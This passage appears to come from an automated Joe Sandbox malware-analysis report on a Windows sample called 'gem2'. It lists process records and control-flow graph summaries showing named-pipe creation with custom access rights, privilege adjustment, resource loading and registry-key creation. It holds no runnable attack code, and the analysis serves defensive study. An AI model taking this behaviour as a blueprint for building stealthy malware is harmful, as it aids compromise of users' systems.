                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:68
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:69
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false


                                                                                Execution Graph

                                                                                Execution Coverage:5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:21.8%
                                                                                Total number of Nodes:174
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 2643109117-1582277970
                                                                                • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction ID: ef3b9a227872be29f23e55731316ac3ab6aeafabd45c73852386ac678036e1ec
                                                                                • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction Fuzzy Hash: 2B4160A1A0970685FB00BF15ED50379A761FFADB80FC448B6D91D437A6DF2CA4458F28

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtFlushKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A7B1156), ref: 00007FF72A7B13F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: Flush
                                                                                • String ID:
                                                                                • API String ID: 1965063083-0
                                                                                • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction ID: 88b744568f042b305bff506e7b37f05ae301629c6a04b26768ed4768f42fd036
                                                                                • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction Fuzzy Hash: 14F0A4B1908B4582E710EF51FC5502AF760FB69380F505C75E99D46725DF3CE0508F68

                                                                                Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: wcslen
• String ID: 0$X&$ 6
• API String ID: 4088430540-2247980209
• Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
• Instruction ID: 6464706ec75f28e0cc2e55cc68ee67327ebcf8e776d6be99e1f45bbb375e6e0e
• Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
• Instruction Fuzzy Hash: 5152A461D2C78284F712AF25DC026F9E370EFA9348FC446B5D94C566A5EF3C6246CB28

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
• String ID: Hc=v+$&
• API String ID: 3825114775-1582277970
• Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
• Instruction ID: 1aa95dcb4a7f2c3ad12c2f9a0b632bd41443919b18459ffadd0fbae71156cf52
• Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
• Instruction Fuzzy Hash: 7E414FA1A1D70284FB00BF19EC50779A761EFADB90F8448B6C91D437A6DF2CA4458F28

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: wcslen$wcscatwcscpywcsncmp
• String ID: 0$X$`
• API String ID: 597572034-2527496196
• Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
• Instruction ID: cb68824a13c651b0e50ad4c390ab5bb605be1f800bba7b516319b490f5f246cd
• Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
• Instruction Fuzzy Hash: 8E02DF62908B8181F720EF15EC057AAB7A0FBA97A4F804275DA9C437E5DF3CD145CB64

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: wcscatwcscpywcslen
• String ID: $0$0$@$@
• API String ID: 3623275624-1413854666
• Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
• Instruction ID: af7ffcc64a2aaeff43c96cadcae37548f729b7c28d63dc60697c4ff41118c4a0
• Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
• Instruction Fuzzy Hash: 25B18D6190C7C185F361AB24EC457BBB7A0FF94348F8041B5EA8952A95DF7CD18A8F24

Control-flow Graph

APIs
• VirtualQuery.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1C63
• VirtualProtect.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1CC7
• memcpy.MSVCRT ref: 00007FF72A7B1CE0
• GetLastError.KERNEL32(?,?,?,?,00007FF72A7BC8F4,00007FF72A7BC8F4,?,?,00007FF72A7B0000,?,00007FF72A7B1991), ref: 00007FF72A7B1D23
Strings
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: Virtual$ErrorLastProtectQuerymemcpy
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 2595394609-2123141913
• Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
• Instruction ID: b8bc439d6d996bf43212dbc73444870a9d053aae7a2546fffe745203b8fae2b0
• Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
• Instruction Fuzzy Hash: 864186A2A0874681FF51AF05DC446B9A760EF6DB80F9448B6CE0D437A1DE3CE589CB24

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
• Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
• String ID:
• API String ID: 926137887-0
• Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
• Instruction ID: 40e9c2dd3c833dd7a2feb3c6380a03c82cabfa250f31eba72c77b4e270e60d04
• Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
• Instruction Fuzzy Hash: E721EA61A0E70681FB55BF11ED40678E260EF3DB90FD548B6C91D477A4DE2CA8428E68

Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction ID: 06b7c61e1fa93179adab152dfec5c0e72ea43191dbae683cd3a3879546e01c64
                                                                                • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction Fuzzy Hash: DD2105A1F0E30249FB747A149D803799181DFAD764FA889B1D91D433C4DF2CA88ACA68

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$@
                                                                                • API String ID: 4088430540-1545510068
                                                                                • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction ID: 569bb9a685d4222d99c5bbbd4e53bac83cb77667e18bd9fe2b57ebc0090fd871
                                                                                • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction Fuzzy Hash: ED115C2252868186E350DF14F84579AF374EFE83A4F905124FA8D83B68EF7DC14ACB10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 349 7ff72a7b1880-7ff72a7b189c 350 7ff72a7b18a2-7ff72a7b18f9 call 7ff72a7b2420 call 7ff72a7b2660 349->350 351 7ff72a7b1a0f-7ff72a7b1a1f 349->351 350->351 356 7ff72a7b18ff-7ff72a7b1910 350->356 357 7ff72a7b1912-7ff72a7b191c 356->357 358 7ff72a7b193e-7ff72a7b1941 356->358 359 7ff72a7b194d-7ff72a7b1954 357->359 360 7ff72a7b191e-7ff72a7b1929 357->360 358->359 361 7ff72a7b1943-7ff72a7b1947 358->361 364 7ff72a7b1956-7ff72a7b1961 359->364 365 7ff72a7b199e-7ff72a7b19a6 359->365 360->359 362 7ff72a7b192b-7ff72a7b193a 360->362 361->359 363 7ff72a7b1a20-7ff72a7b1a26 361->363 362->358 366 7ff72a7b1b87-7ff72a7b1b98 call 7ff72a7b1d40 363->366 367 7ff72a7b1a2c-7ff72a7b1a37 363->367 368 7ff72a7b1970-7ff72a7b199c call 7ff72a7b1ba0 364->368 365->351 369 7ff72a7b19a8-7ff72a7b19c1 365->369 367->365 370 7ff72a7b1a3d-7ff72a7b1a5f 367->370 368->365 373 7ff72a7b19df-7ff72a7b19e7 369->373 376 7ff72a7b1a7d-7ff72a7b1a97 370->376 374 7ff72a7b19d0-7ff72a7b19dd 373->374 375 7ff72a7b19e9-7ff72a7b1a0d VirtualProtect 373->375 374->351 374->373 375->374 379 7ff72a7b1a70-7ff72a7b1a77 375->379 380 7ff72a7b1b74-7ff72a7b1b82 call 7ff72a7b1d40 376->380 381 7ff72a7b1a9d-7ff72a7b1afa 376->381 379->365 379->376 380->366 386 7ff72a7b1b22-7ff72a7b1b26 381->386 387 7ff72a7b1afc-7ff72a7b1b0e 381->387 386->379 390 7ff72a7b1b2c-7ff72a7b1b30 386->390 388 7ff72a7b1b10-7ff72a7b1b20 387->388 389 7ff72a7b1b5c-7ff72a7b1b6f call 7ff72a7b1d40 387->389 388->386 388->389 389->380 390->379 391 7ff72a7b1b36-7ff72a7b1b53 call 7ff72a7b1ba0 390->391 391->389
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A7B1247), ref: 00007FF72A7B19F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction ID: 4f83235bd2d6cd6702c5a6fe8154f97febba172ede71017a0ff7b863362fdee5
                                                                                • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction Fuzzy Hash: D3515FA1A08786C6FB10AF25DC447B9A761EB6DB94F8449B1DA1C07794CF3CE486CF24

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 395 7ff72a7b1800-7ff72a7b1810 396 7ff72a7b1812-7ff72a7b1822 395->396 397 7ff72a7b1824 395->397 398 7ff72a7b182b-7ff72a7b1867 call 7ff72a7b2290 fprintf 396->398 397->398
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction ID: eedd1e36da1ec1aa5aef320f897762a0461a0c3c66298b4f3eb5d3bb959cea92
                                                                                • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction Fuzzy Hash: 07F0AF51A18B4982F320AF24AD410B9E360EBAD390F909A71EF4D92361DF2CE1828B14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction ID: 6217aae0b7602d2914434893f8ed24dca5674463c2cff2dd7fc4b21308776c51
                                                                                • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction Fuzzy Hash: 1B011261A0E70692F745BF11AD00178D220FF3CB90FC544B5C90D437A4DF2CA8528A68

                                                                                Execution Graph

                                                                                Execution Coverage: 45.4%
                                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                                Signature Coverage: 40.1%
                                                                                Total number of Nodes: 227
                                                                                Total number of Limit Nodes: 25
                                                                                execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 
